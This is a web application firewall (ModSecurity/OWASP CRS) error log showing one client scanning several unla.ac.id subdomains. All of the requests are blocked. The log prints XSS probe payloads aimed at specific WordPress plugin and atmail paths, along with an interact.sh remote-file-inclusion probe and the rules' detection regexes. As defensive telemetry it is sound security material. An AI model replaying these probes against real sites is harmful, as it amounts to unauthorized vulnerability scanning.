[Tue Aug 29 11:51:40.878167 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnHQgYAAAAT"]
[Tue Aug 29 11:51:40.888386 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAfWOG4AAAAL"]
[Tue Aug 29 11:51:40.893247 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAhoHQYAAAAl"]
[Tue Aug 29 11:51:40.900112 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15XMCo-f0AAAmLPUwAAAAN"]
[Tue Aug 29 11:51:40.909172 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnmT1sAAAAd"]
[Tue Aug 29 11:51:41.612153 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XcCo-f0AAAnd2-8AAAAI"]
[Tue Aug 29 11:51:42.548364 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAmLPU8AAAAN"]
[Tue Aug 29 11:51:42.588648 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAngCU8AAAAP"]
[Tue Aug 29 11:51:42.604445 2023] [:error] [pid 2520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnYkj0AAAAD"]
[Tue Aug 29 11:51:42.631106 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAjdQXAAAAAZ"]
[Tue Aug 29 11:51:42.642187 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAngCVEAAAAP"]
[Tue Aug 29 11:51:43.641712 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15X8Co-f0AAAnn19MAAAAe"]
[Tue Aug 29 11:51:44.568174 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmLPVcAAAAN"]
[Tue Aug 29 11:51:44.574383 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnmT2MAAAAd"]
[Tue Aug 29 11:51:44.583212 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnHQhUAAAAT"]
[Tue Aug 29 11:51:44.671965 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnepOkAAAAK"]
[Tue Aug 29 11:51:44.684134 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmLPVsAAAAN"]
[Tue Aug 29 11:51:45.544367 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnVEe8AAAAB"]
[Tue Aug 29 11:51:45.557983 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnmT2cAAAAd"]
[Tue Aug 29 11:51:45.567875 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAhoHQoAAAAl"]
[Tue Aug 29 11:51:45.618769 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnepOsAAAAK"]
[Tue Aug 29 11:51:45.630794 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAmIbSQAAAAo"]
[Tue Aug 29 11:51:45.652627 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YcCo-f0AAAjdQXsAAAAZ"]
[Tue Aug 29 11:51:46.740524 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YsCo-f0AAAnmT24AAAAd"]
[Tue Aug 29 11:51:47.541606 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAm7nDMAAAAE"]
[Tue Aug 29 11:51:47.547657 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnZfE4AAAAG"]
